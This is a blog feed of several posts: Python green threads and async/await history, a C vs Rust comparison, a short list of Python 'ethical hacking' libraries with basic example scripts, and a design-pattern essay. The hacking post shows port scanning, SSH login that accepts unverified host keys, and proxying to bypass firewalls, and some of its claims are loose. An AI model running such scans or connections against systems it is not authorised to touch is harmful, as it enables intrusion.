<p>Green threads, or proto threads as they might be known in other terms, are execution contexts that are implemented in a language's runtime and try to mimic the working of OS-level threads. They run in the same process and within the same thread of execution provided by the OS. Due to their extremely lightweight nature, hundreds of thousands of green threads can be typically run by a language runtime.</p>
<h4 id="heading-implementation">Implementation</h4>
<p>To implement green threads in any language runtime, we need to first know how the operating system handles its threads, why they're so expensive and how we can implement lightweight versions in our runtime. First of all, we've already outlined the fact that every OS thread takes up a significant amount of memory to save its context, and also the <a target="_blank" href="https://en.wikipedia.org/wiki/Scheduling_(computing)">OS Scheduler</a> takes a lot of time switching between various threads. There are more issues caused by synchronization techniques such as mutexes and semaphores, which cause lock contention, lock starvation and other <a target="_blank" href="https://en.wikipedia.org/wiki/Lock_(computer_science)#Disadvantages">disadvantages of using locks</a>.</p>
<p>Knowing that, we go ahead to design our green threads with two major goals in mind, that is to say, they should be very memory efficient hence lightweight, and have fast context switching. Because green threads are implemented with memory-efficient language machinery we can have hundreds of thousands of them run in a single process. And given the fact that they run in the same process and same thread, we eliminate the need for context switching by the OS and handle it ourselves, which makes it extremely fast.</p>
<h3 id="heading-green-threads-in-python">Green threads in python</h3>
<p>Before the advent of asyncio, significant efforts in the python world were made to create libraries that provide green threads. One of the major pioneers was <a target="_blank" href="https://greenlet.readthedocs.io/en/latest/">greenlet</a>, which implemented an industry-used framework to work with green threads. The twisted project came in later, which also introduced an easy-to-use industry framework to build web servers and services using python green threads. Today, lots of frameworks have been written to help use python green threads, and asyncio has created the standard for working with these green threads.</p>
<h4 id="heading-implementing-python-green-threads-with-generators">Implementing python green threads with generators</h4>
<p>So let us walk the journey of the evolution of green threads in python and how they were implemented over time up to this day.</p>
<p>First of all, we need to ask ourselves how we can implement green threads. From what we mentioned in the previous section, green threads should be able to mimic OS threads by having the ability to run a task and also allowing for context switching, since all the green threads should share a single process to execute. One feature of the python language has qualities that might help us implement this: <a target="_blank" href="https://realpython.com/introduction-to-python-generators/">generators</a>. Python generators were first standardized in <a target="_blank" href="https://peps.python.org/pep-0255/"><strong>PEP 255: Simple Generators</strong></a> as early as the year 2000 and they provide a way of creating iterators that can be executed on demand. This implicitly means that generators can run a task since they are functions in themselves, and also can save their state to be resumed later. So they can be paused and resumed, a key feature to help us build green threads since we need our execution environment to pause a running task and resume it later without impact.</p>
<p>Generators also cannot be paused by the outside world; they can only be paused from within, after yielding their value. This means that the green threads we write tell the execution environment when to be paused, rather than the execution environment abruptly deciding when to stop the thread. So if the green thread is in the middle of an important database transaction or memory access, it can run without interruption until it feels safe to yield its control back to the execution environment. This is called <a target="_blank" href="https://en.wikipedia.org/wiki/Cooperative_multitasking">cooperative multitasking</a>.</p>
<p>Alright, enough with the gibberish. Let's try to implement a green thread system in python. To implement the green thread system, we need two components: the green thread itself and the executor running the green threads in a loop. The executor is commonly known as the event loop. But before we dig deep into the implementation, let us first have a brief look at generators in python.</p>
<pre><code class="lang-python"><span class="hljs-comment"># A simple generator that yields values from a list of numbers</span>
nums = [ num <span class="hljs-keyword">for</span> num <span class="hljs-keyword">in</span> range(<span class="hljs-number">20</span>)]

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">num_generator</span> (<span class="hljs-params">num_list</span>):</span>
    index = <span class="hljs-number">0</span>                     <span class="hljs-comment">#index of elements in the number list</span>
    max_index = len(num_list) - <span class="hljs-number">1</span>    <span class="hljs-comment">#the maximum index of elements in a list</span>
    <span class="hljs-keyword">while</span> (index &lt;= max_index):
        temp_index = index        <span class="hljs-comment">#hold the current index</span>
        index += <span class="hljs-number">1</span>                <span class="hljs-comment">#increment to next index</span>
        <span class="hljs-keyword">yield</span> num_list[temp_index]<span class="hljs-comment">#yield value at current index</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">printer</span> ():</span>
    <span class="hljs-keyword">for</span> num <span class="hljs-keyword">in</span> num_generator(nums):
        print(num)

printer()
</code></pre>
<p>The above example shows us the basic structure of a typical generator. Any functional generator should have a loop and a yield statement. Our num_generator generator function yields one number at a time when iterated over in the printer function. If we wanted to have more control of the execution of the generator, we would use the built-in <code>next</code> function which tells the generator to yield the next value and pause.</p>
<pre><code class="lang-python"><span class="hljs-comment"># A simple generator that yields values from a list of numbers</span>
nums = [ num <span class="hljs-keyword">for</span> num <span class="hljs-keyword">in</span> range(<span class="hljs-number">20</span>)]

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">num_generator</span> (<span class="hljs-params">num_list</span>):</span>
    index = <span class="hljs-number">0</span>                     <span class="hljs-comment">#index of elements in the number list</span>
    max_index = len(num_list) - <span class="hljs-number">1</span>    <span class="hljs-comment">#the maximum index of elements in a list</span>
    <span class="hljs-keyword">while</span> (index &lt;= max_index):
        temp_index = index        <span class="hljs-comment">#hold the current index</span>
        index += <span class="hljs-number">1</span>                <span class="hljs-comment">#increment to next index</span>
        <span class="hljs-keyword">yield</span> num_list[temp_index]<span class="hljs-comment">#yield value at current index</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">printer</span> ():</span>
    max_times = <span class="hljs-number">10</span>        <span class="hljs-comment">#maximum number of times to call next</span>
    counter = <span class="hljs-number">0</span>
    num_gen = num_generator(nums)
    <span class="hljs-keyword">while</span> (counter &lt;= max_times):
        num = next(num_gen)
        counter += <span class="hljs-number">1</span>
        print(num)

printer()
</code></pre>
<p>We've updated the code in the printer function to call next on the num_gen generator and terminate when the counter is greater than max_times.</p>
<p>Let us now have three instances of the generator function become our threads and then create an executor to run them.</p>
<pre><code class="lang-python"><span class="hljs-comment"># A simple generator that yields values from a list of numbers</span>
nums = [ num <span class="hljs-keyword">for</span> num <span class="hljs-keyword">in</span> range(<span class="hljs-number">20</span>)]

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">num_generator</span> (<span class="hljs-params">num_list</span>):</span>
    index = <span class="hljs-number">0</span>                     <span class="hljs-comment">#index of elements in the number list</span>
    max_index = len(num_list) - <span class="hljs-number">1</span>    <span class="hljs-comment">#the maximum index of elements in a list</span>
    <span class="hljs-keyword">while</span> (index &lt;= max_index):
        temp_index = index        <span class="hljs-comment">#hold the current index</span>
        index += <span class="hljs-number">1</span>                <span class="hljs-comment">#increment to next index</span>
        <span class="hljs-keyword">yield</span> num_list[temp_index]<span class="hljs-comment">#yield value at current index</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">executor</span> ():</span>
    <span class="hljs-comment"># create a list of three green threads</span>
    green_threads = [num_generator(nums) <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">3</span>)]
    <span class="hljs-keyword">while</span> len(green_threads):        <span class="hljs-comment"># while green threads still in list</span>
        <span class="hljs-keyword">for</span> thread <span class="hljs-keyword">in</span> green_threads[:]: <span class="hljs-comment"># iterate over a copy so remove() is safe</span>
            num = next(thread)
            <span class="hljs-keyword">if</span> (num &gt;= <span class="hljs-number">10</span>):
                green_threads.remove(thread)
            <span class="hljs-keyword">else</span>:
                print(num)

executor()
</code></pre>
<p>In the above code snippet, the threads in the green_threads list are run concurrently and removed if they yield a value greater than or equal to ten. This is a simple demonstration of how to use a list of generators and an evaluation loop as a green threads system, but this is not what happens in practice.</p>
<h4 id="heading-generators-as-coroutines">Generators as coroutines</h4>
<p>We have taken a glimpse at generators in the above section and how we can work with them as green threads. Looking at how we implemented our system earlier, it looked like we had a set of running routines (functions) that participated in the cooperative multithreading model in that one routine yielded control back to the executor to run the next routine after it was done with its temporary execution. These cooperatively running routines are called <a target="_blank" href="https://en.wikipedia.org/wiki/Coroutine"><strong>coroutines</strong></a><strong>.</strong></p>
<p>Generators feel like coroutines, but not quite. This is because we can currently only retrieve data from them and cannot send data inside them for processing. They feel more like data producers, and indeed they are powerful data producers. We can also not explicitly close a generator unless it raises a StopIteration on its own. This is important since we need to have full execution of our green threads and stop their execution in case something goes wrong. So to use them as coroutines, we need a key ingredient, which is the ability to interact with these coroutines as they are running, probably to change their execution state or feed in more data for processing and more.</p>
<p>For that, <a target="_blank" href="https://peps.python.org/pep-0342/">PEP 342: Coroutines via enhanced generators</a> was devised in 2005. It extended the simple python generators from PEP 255 into more usable coroutines by adding the ability to send data into a running generator using the newly added <strong>send</strong> method, send an error into the generator using the <strong>throw</strong> method, and stop it if needed using the <strong>close</strong> method. With these changes, we can now implement proper green threads using coroutines as described in PEP 342. Note that the <strong>send</strong> method is not meant to send large chunks of data into a running generator, but you can use it to send control statements to change the execution state of a generator in case it was implemented as a <a target="_blank" href="https://en.wikipedia.org/wiki/Finite-state_machine">finite state machine</a>. Also, if we call the send method with None as the argument, we're just telling the coroutine to execute in the same way we'd use the next built-in function. For fear of an exceedingly long blog post, I'll not place examples for this, but I'll add a link to a very detailed series of youtube videos by a python core developer explaining the internals quite simply and in detail.</p>
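<p>The three PEP 342 methods in one runnable sketch, added here as an illustration and not part of the original post: each green thread is a small finite state machine that takes control words through <code>send</code>, recovers from an error delivered with <code>throw</code>, and runs its cleanup when the executor calls <code>close</code>. The names <code>worker</code>, <code>executor</code>, <code>script</code> and <code>demo</code> are made up for this example.</p>

```python
from collections import deque


def worker(name, limit, log):
    """Green thread written as a two-state machine: running or paused."""
    done, paused = 0, False
    try:
        while done < limit:
            try:
                command = yield (name, done)   # hand control back to the executor
            except ValueError as exc:          # an error delivered with throw()
                log.append(f"{name} handled: {exc}")
                continue                       # recover and yield again
            if command == "pause":
                paused = True
            elif command == "resume":
                paused = False
            if not paused:
                done += 1                      # one unit of work per turn
    finally:
        log.append(f"{name} cleanup")          # runs on close() and on normal exit
    return done                                # carried out in StopIteration.value


def executor(threads, script):
    """Round-robin executor.

    script maps a thread name to the actions for its successive turns:
    None or a control word goes through send(), an exception instance goes
    through throw(), and the string "close" stops the thread with close().
    Returns {name: (outcome, turns_taken)}.
    """
    pending = {name: deque(actions) for name, actions in script.items()}
    ready, results, turns = deque(), {}, {}
    for name, thread in threads.items():
        turns[name] = 0
        try:
            thread.send(None)                  # prime: identical to next(thread)
            ready.append((name, thread))
        except StopIteration as stop:          # finished before its first yield
            results[name] = (stop.value, 0)
    while ready:
        name, thread = ready.popleft()
        queue = pending.get(name)
        action = queue.popleft() if queue else None
        turns[name] += 1
        try:
            if action == "close":
                thread.close()                 # raises GeneratorExit inside worker
                results[name] = ("closed", turns[name])
                continue
            if isinstance(action, Exception):
                thread.throw(action)           # resumes worker with the error
            else:
                thread.send(action)            # resumes worker with a value
        except StopIteration as stop:
            results[name] = (stop.value, turns[name])
            continue
        ready.append((name, thread))           # still alive: back of the queue
    return results


def demo():
    """Constructed scenario: pause/resume a, inject an error into b, close c."""
    log = []
    threads = {
        "a": worker("a", 3, log),
        "b": worker("b", 2, log),
        "c": worker("c", 5, log),
    }
    script = {
        "a": ["pause", None, "resume"],
        "b": [ValueError("bad input")],
        "c": [None, "close"],
    }
    return executor(threads, script), log


if __name__ == "__main__":
    print(demo())
```

<p>Thread a needs five turns for three units of work because two turns were spent paused, and thread c's <code>finally</code> block runs even though it was stopped from outside.</p>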
<h4 id="heading-factoring-out-the-generator">Factoring out the generator</h4>
<p>It became pretty apparent after the prominent use of generator-based coroutines that developers needed to factor out the "yield" statements from the coroutines to avoid redundancy. This was because generators could only yield to their immediate caller and it was getting hard to reuse some parts of code across different codebases. <a target="_blank" href="https://peps.python.org/pep-0380/">PEP 380: Syntax for delegating to a sub-generator</a> was devised in 2009 to solve this problem, and it introduced the use of "yield from" to extract a generator part of a coroutine and place it in a sub-generator, which would let the sub-generator be used across different modules and libraries. For brevity, more detail on the use of "yield from" can be read in this <a target="_blank" href="http://simeonvisser.com/posts/python-3-using-yield-from-in-generators-part-1.html">article</a>.</p>
<h3 id="heading-async-await-and-asyncio">Async, Await and Asyncio</h3>
<p>If you followed through the evolutionary journey of the python coroutine stack, you're now at the final stage of the evolution cycle. In the previous section, Factoring out the generator, we talked about the introduction of the "yield from" statement and how it was used to factor out sub-generators to create reusable code. Well, it turns out that "yield" and "from" are two independent python keywords that are fundamentally different in how they are interpreted by python developers, and having them work together in this way was getting confusing. Not to mention, the industry had begun standardizing a given set of keywords to use for coroutines, namely the "async" and "await" statements. To sort out the confusion and also meet industry standards, <a target="_blank" href="https://peps.python.org/pep-0492/">PEP 492: Coroutines with async and await syntax</a> was introduced. The PEP replaced the use of "yield from" with "await", and also mandated that every function that has an "await" keyword inside its block should be marked with an "async" keyword. Fundamentally, the async-await coroutines are still generators, and they have the same API as generators do.</p>
<p>With the async and await syntax established, the asyncio library was also standardized in <a target="_blank" href="https://peps.python.org/pep-3156/">PEP 3156: Asynchronous IO support rebooted, the "asyncio" Module</a> after much work on the Tulip project by Guido van Rossum himself.</p>
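<p>To make the last two sections concrete, here is an added example (not from the original post) that writes the same two-level delegation once with "yield from" and once with "async"/"await", then drives both with one hand-written executor that only uses <code>send</code>, <code>close</code> and <code>StopIteration</code>. All function names, the <code>ReadChunk</code> awaitable and the sample data are made up for this illustration.</p>

```python
import inspect

# Constructed sample data the executor hands back for each read request.
ANSWERS = {"a.txt": "alpha", "b.txt": "beta"}


# --- PEP 380 style: generators delegating with "yield from" ---------------
def read_chunk(source):
    """Leaf sub-generator: the only place that really suspends."""
    data = yield ("read", source)      # travels up through every yield from
    return data                        # becomes the value of yield from


def parse_gen(source):
    raw = yield from read_chunk(source)
    return raw.upper()


def handle_gen(sources):
    parts = []
    for source in sources:
        parts.append((yield from parse_gen(source)))
    return parts


# --- PEP 492 style: the same structure with async / await ------------------
class ReadChunk:
    """Awaitable leaf: __await__ is a generator, so it can suspend with yield."""

    def __init__(self, source):
        self.source = source

    def __await__(self):
        data = yield ("read", self.source)
        return data


async def parse_async(source):
    raw = await ReadChunk(source)
    return raw.upper()


async def handle_async(sources):
    parts = []
    for source in sources:
        parts.append(await parse_async(source))
    return parts


# --- One executor for both ---------------------------------------------------
def drive(coro, answers):
    """Run a generator or a native coroutine to completion.

    Every suspension surfaces here as a ("read", source) request, however
    deeply it was delegated; the answer is pushed back in with send().
    """
    requests = []
    try:
        request = coro.send(None)                      # start it
        while True:
            requests.append(request)
            request = coro.send(answers[request[1]])   # resume with the data
    except StopIteration as stop:
        return stop.value, requests                    # the final return value


def cancel_midway():
    """close() works on a native coroutine exactly as it does on a generator."""
    coro = handle_async(["a.txt"])
    first_request = coro.send(None)
    coro.close()
    return first_request, inspect.getcoroutinestate(coro)


if __name__ == "__main__":
    print(drive(handle_gen(["a.txt", "b.txt"]), ANSWERS))
    print(drive(handle_async(["a.txt", "b.txt"]), ANSWERS))
    print(cancel_midway())
```

<p>asyncio's event loop plays the role of <code>drive</code> here, with sockets and timers in place of the constructed <code>ANSWERS</code> dictionary.</p>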
<h3 id="heading-conclusion">Conclusion</h3>
<p>This blog post was meant as a study of the origin and importance of asynchronous programming, especially in python, and how it evolved with time. It's not meant as a tutorial for the asyncio library and writing async code, but rather to answer a few questions about why you should take time to learn asynchronous programming. There are lots of tutorials out there to help you get started with asyncio and I wouldn't wish to duplicate the efforts; I'll just add links to what I feel is the best material out there for learning asyncio.</p>
<p>This blog post is but a mere fraction of the entire plethora of knowledge out there about asynchronous programming in python, but I do hope it helps you answer the most fundamental questions that I also had to ask while starting out my journey of mastering asyncio.</p>
<h3 id="heading-links">Links</h3>
<p><strong><mark>Videos</mark></strong></p>
<p><a target="_blank" href="https://www.youtube.com/watch?v=1coLC-MUCJc">Guido presents project Tulip; Twitter university</a></p>
<p><a target="_blank" href="https://www.youtube.com/watch?v=aurOB4qYuFM">Guido on Tulip; Bay Piggies</a></p>
<p><a target="_blank" href="https://www.youtube.com/watch?v=Xbl7XjFYsN4&amp;list=PLhNSoGM2ik6SIkVGXWBwerucXjgP1rHmB">import Asyncio; EdgeDB</a></p>
<p><strong><mark>Articles</mark></strong></p>
<p><a target="_blank" href="https://superfastpython.com/python-asyncio/">Python Asyncio: The complete guide; superfast python</a></p>
<p><a target="_blank" href="https://realpython.com/async-io-python/">Asyncio in Python: A complete walkthrough; Real Python</a></p>
]]></content:encoded></item><item><title><![CDATA[C vs Rust cyber security programming. Which one to choose.]]></title><description><![CDATA[Both C and Rust are programming languages that can be challenging to learn, especially if you are new to programming. However, they are both powerful languages that are widely used in the software industry.
To create a simple Fibonacci sequence in C,...]]></description><link>https://blog.oscakampala.org/c-vs-rust-cyber-security-programming-which-one-to-choose</link><guid isPermaLink="true">https://blog.oscakampala.org/c-vs-rust-cyber-security-programming-which-one-to-choose</guid><category><![CDATA[Rust]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[Binary Exploitation]]></category><category><![CDATA[C]]></category><category><![CDATA[programming languages]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Sun, 08 Jan 2023 21:21:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1673211457912/fa62d6fb-459d-48d3-93d0-a4006a86b4b3.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Both C and Rust are programming languages that can be challenging to learn, especially if you are new to programming. However, they are both powerful languages that are widely used in the software industry.</p>
<p>To create a simple Fibonacci sequence in C, you could use the following code:</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
   <span class="hljs-keyword">int</span> i, n, t1 = <span class="hljs-number">0</span>, t2 = <span class="hljs-number">1</span>, nextTerm;

   <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Enter the number of terms: "</span>);
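   <span class="hljs-keyword">if</span> (<span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &amp;n) != <span class="hljs-number">1</span>) {
      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;   <span class="hljs-comment">// no valid integer was read, so n would be uninitialized</span>
   }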

   <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Fibonacci Series: "</span>);

   <span class="hljs-keyword">for</span> (i = <span class="hljs-number">1</span>; i &lt;= n; ++i) {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d, "</span>, t1);
      nextTerm = t1 + t2;
      t1 = t2;
      t2 = nextTerm;
   }
   <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>To create a simple Fibonacci sequence in Rust, you could use the following code:</p>
<pre><code class="lang-rust"><span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">main</span></span>() {
    <span class="hljs-keyword">let</span> <span class="hljs-keyword">mut</span> t1 = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">let</span> <span class="hljs-keyword">mut</span> t2 = <span class="hljs-number">1</span>;
    <span class="hljs-keyword">let</span> <span class="hljs-keyword">mut</span> next_term;
    <span class="hljs-keyword">let</span> n = <span class="hljs-number">10</span>;

    <span class="hljs-built_in">println!</span>(<span class="hljs-string">"Fibonacci Series: "</span>);

    <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> <span class="hljs-number">0</span>..n {
        next_term = t1 + t2;
        t1 = t2;
        t2 = next_term;

        <span class="hljs-built_in">println!</span>(<span class="hljs-string">"{}"</span>, t1);
    }
}
</code></pre>
<p>It is difficult to determine which version of the code will be faster without profiling them and comparing the performance. In general, C is known for being a fast and efficient language, while Rust is designed to provide the performance of a systems language while being safer and easier to use.</p>
<p>It is difficult to determine which of the two languages, C or Rust, is the "best" to use in cybersecurity based on the simple Fibonacci sequence examples provided. Both C and Rust are powerful languages that are used in a variety of applications, including in the field of cybersecurity.</p>
<p>In the field of cybersecurity, either C or Rust could be a good choice, depending on your specific needs and goals. Both languages have their own strengths and limitations, and the best choice for your project will depend on the requirements and constraints of your project.</p>
<p>In general, if you are new to programming and are looking for a language that is easier to learn and use, Rust may be a better choice for you. On the other hand, if you have experience with C or other low-level languages and are comfortable with the complexity and challenges of systems programming, C may be a better choice. Ultimately, the best language for your project will depend on your specific goals and requirements.</p>
<p>As you can see, both languages can express the same program, just with different syntax. Both are compiled, and fast.</p>
]]></content:encoded></item><item><title><![CDATA[Python Ethical Hacking Libraries]]></title><description><![CDATA[Libraries used in python for ethical hacking and cyber security.
As security developers, we need to know the libraries to use when creating hacking tools.
There are a number of libraries that can be used for ethical hacking and cyber security in Pyth...]]></description><link>https://blog.oscakampala.org/python-ethical-hacking-libraries</link><guid isPermaLink="true">https://blog.oscakampala.org/python-ethical-hacking-libraries</guid><category><![CDATA[Python]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[bugbounty]]></category><category><![CDATA[Scripting]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Sun, 08 Jan 2023 07:27:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1673161565300/ad47150c-1036-4e54-a81c-a7b1b26bcc9a.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Libraries used in python for ethical hacking and cyber security.</p>
<p>As security developers, we need to know the libraries to use when creating hacking tools.</p>
<p>There are a number of libraries that can be used for ethical hacking and cyber security in Python. Some examples include:</p>
<p>Scapy: A powerful packet manipulation library that allows you to craft custom packets, send them over the wire, capture and analyze them, and more. It can be used for tasks such as network scanning, service fingerprinting, and exploitation.</p>
<p>Paramiko: A library for implementing SSH and SFTP in Python. It can be used to remotely execute commands, transfer files, and manage remote servers.</p>
<p>Cryptography: A library for encrypting and decrypting data, as well as other cryptographic tasks such as generating hashes and signing messages.</p>
<p>Pwntools: A library specifically designed for writing and testing exploits. It includes features such as automatic exploit generation and a debugger.</p>
<p>Nmap: A popular network scanning tool that can be used to discover hosts and services on a network, as well as to perform security assessments. The Nmap library allows you to use Nmap from within Python.</p>
<p>SocksiPy: A library for implementing SOCKS proxies in Python. It can be used to establish anonymous connections, bypass firewalls, and more.</p>
<p>Requests: A library for making HTTP requests in Python. It can be used for tasks such as testing web servers, submitting forms, and automating login processes.</p>
<p>These are just a few examples of the many libraries that can be used for ethical hacking and cyber security in Python.</p>
<p>Here are simple example scripts for each of the libraries mentioned above:</p>
<p>Scapy:</p>
<pre><code class="lang-python"># Import the Scapy library
from scapy.all import *

# Create a custom packet
packet = IP(dst="www.example.com") / ICMP()

# Send the packet and receive the response
response = sr1(packet)

# Print the response
print(response)
</code></pre>
<p>Paramiko:</p>
<pre><code class="lang-python"># Import the Paramiko library
import paramiko

# Set up the SSH client
client = paramiko.SSHClient()
client.load_system_host_keys()
# AutoAddPolicy accepts any unknown host key without verifying it
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Connect to the server
client.connect("www.example.com", username="user", password="password")

# Execute a command
stdin, stdout, stderr = client.exec_command("ls")

# Print the output of the command
print(stdout.read())

# Disconnect from the server
client.close()
</code></pre>
<p>Cryptography:</p>
<pre><code class="lang-python"># Import Fernet from the Cryptography library
# (a bare "import cryptography" does not load the fernet submodule)
from cryptography.fernet import Fernet

# Generate a random key
key = Fernet.generate_key()

# Create a Fernet object using the key
fernet = Fernet(key)

# Encrypt some data
data = b"secret message"
encrypted_data = fernet.encrypt(data)

# Decrypt the data
decrypted_data = fernet.decrypt(encrypted_data)

# Print the original and decrypted data
print(data)
print(decrypted_data)
</code></pre>
<p>Pwntools:</p>
<pre><code class="lang-python"># Import the Pwntools library
import pwn

# Connect to a remote server (the connection object carries the send/recv methods)
conn = pwn.remote("www.example.com", 12345)

# Send a message to the server
conn.sendline(b"Hello, server!")

# Receive a response from the server
response = conn.recv()

# Print the response
print(response)

# Disconnect from the server
conn.close()
</code></pre>
<p>Nmap:</p>
<pre><code class="lang-python"># Import the Nmap library
import nmap

# Create an Nmap scanner object
scanner = nmap.PortScanner()

# Scan a host for open ports
scanner.scan("www.example.com", "1-1024")

# Print the results of the scan
print(scanner.scaninfo())
print(scanner.csv())
</code></pre>
<p>SocksiPy:</p>
<pre><code class="lang-python"># Import the SocksiPy library
import socks
import socket

# Set up a SOCKS proxy
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "localhost", 1080)
socket.socket = socks.socksocket

# Connect to a remote server through the proxy
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("www.example.com", 80))
</code></pre>
<p>Requests:</p>
<pre><code class="lang-python"># Import the Requests library
import requests

# Make a GET request to a web server
response = requests.get("https://www.example.com/")

# Print the status code and the content of the response
print(response.status_code)
print(response.content)

# Make a POST request to a web server
response = requests.post("https://www.example.com/login", data={"username": "user", "password": "password"})

# Print the status code and the content of the response
print(response.status_code)
print(response.content)
</code></pre>
<p>Stay tuned for more. And build your own tools using the heads-up on these libraries. 👍</p>
]]></content:encoded></item><item><title><![CDATA[Design Pattern: Software abstractions]]></title><description><![CDATA[Tom is a very hardworking delivery man working for Ryder, a very large delivery company in Uganda. He was posted in the eastern part of the country and has been making deliveries there for 7 years now. By now, he knows the entire region and neighborh...]]></description><link>https://blog.oscakampala.org/design-pattern-software-abstractions</link><guid isPermaLink="true">https://blog.oscakampala.org/design-pattern-software-abstractions</guid><category><![CDATA[Python]]></category><dc:creator><![CDATA[TobiasHT]]></dc:creator><pubDate>Sat, 07 Jan 2023 11:22:38 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/t0Aio60jD4Q/upload/e0e782f8e1d8af969bd92d6d07a947de.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Tom is a very hardworking delivery man working for Ryder, a very large delivery company in Uganda. He was posted in the eastern part of the country and has been making deliveries there for 7 years now. By now, he knows the entire region and neighborhoods therein at the back of his hand. The neighborhood is very friendly and they also give him sizeable tips whenever he delivers to them. Tom has made lots of friends in the region, but his closest friends are the Mulindwa family, where he makes the most deliveries. On a busy week, he can make over 100 deliveries to the Mulindwas.</p>
<p>One day, he was given a package to deliver to the Mulindwas. He got into his delivery van to take the package to the Mulindwas. To his shock, he found the Mulindwas' house empty. It looked like they had moved. "To where?" Tom wondered to himself, "and what should I do with the package now?" he wondered even more. He tried asking around to find out where the Mulindwas had moved to, but it was all in vain. Not having any other choice, he decided to take back the package to the company. More and more packages were given to him to deliver to the Mulindwas, but he could not. And whenever he returned them, the packages were just placed in storage. They later sold them without anyone to claim them.</p>
<p>There is a lesson to learn about Tom's relationship with the Mulindwa family or the Mulindwa residence in particular. Tom was so accustomed to the Mulindwa residence that he never thought they'd ever move from that place. The Mulindwas also did not bother to inform Tom and the delivery company of their moving and their new address, so the company could not locate them. The attachment between Tom and the Mulindwas is what we call in software terms "tight coupling". When systems are tightly coupled, they are interdependent, and a change in one system may lead to the failure of the other.</p>
<h4 id="heading-tightly-coupled-systems">Tightly coupled systems</h4>
<p>Tightly coupled systems are characterized by programs that rely too much on each other to perform a given task. The programs expose to each other a set of API functions to call to run operations, and also the programs assume a lot of internal detail about the running of each other. For example in the case of Tom, he knew quite a lot about the time the Mulindwas woke up, their time for breakfast, the schools that John Mulindwa and Emily Mulindwa went to and the time they got back from school; basically, he knew a lot about them. If you are worried about the security of the Mulindwa family in case Tom was a threat actor, then you absolutely should be. If one program knows a lot about how another program runs internally, there's a high chance it will be dependent on those steps to run before it also runs. And if program A exposes internal details to program B that can be modified to alter the running of A, then the system is almost beyond saving, as malicious code can easily corrupt it and the entire system.</p>
<p>Tightly coupled systems are usually developed at the earlier stages of a project, and in most cases usually arise due to poor architectural design of the project. Tightly coupled systems are not scalable as they limit the interdependent programs from evolving independently of each other and according to the needs of each program. It means that if a change has to be made in program A, then program B has to be changed as well to reconcile with the new change in A to avoid failure. If there were over 100 programs or services dependent on each other, it would be hard to reconcile the change in A among all the connected programs, hence impacting the scalability of the entire system.</p>
<p>Tightly coupled systems occur in various parts of a system, from variables inside a program to massive backend service clusters. So to deal with tightly coupled systems, we need to know at what level the coupling is happening. The general and most effective solution to coupling is introducing layers of abstraction into the system. These layers of abstraction should then only communicate to each other via message passing. The surface layer receives the message from the external program and transports it into the internal layers for processing. The internal layers then pass back a response to the surface API which is communicated back to the listening program. In case there's a change in the internal state of the processing program, the listening program is not affected. So to fix the problem with Tom and the Mulindwas, Tom is now supposed to deliver mail to the local regional mail receiver which will transport them to the mailboxes of the residents in that neighborhood. This limits Tom's direct interaction with residents. And when the Mulindwas move, they only leave their new delivery address to the regional mail receiver who can still route their mail to them, and Tom can still keep delivering mail without knowing if the Mulindwas moved or not. It also relieves the heartbreaking moment where the Mulindwas have to say goodbye to Tom.</p>
<p>So to put some of the concepts discussed above into practice, here's how we would implement some software abstractions.</p>
<p>At the language level, if one is using the object-oriented paradigm, the <strong><mark>objects should not expose their internal state. And if they should, external programs should not modify that state directly.</mark></strong></p>
<pre><code class="lang-python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Book</span> (<span class="hljs-params">object</span>):</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span> (<span class="hljs-params">self,
        name:str,
        author:str,
        price:int,
    </span>) -&gt; <span class="hljs-keyword">None</span>:</span>
        self._name = name
        self._author = author
        self._price = price

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">name</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._name

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">author</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._author

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">price</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._price
</code></pre>
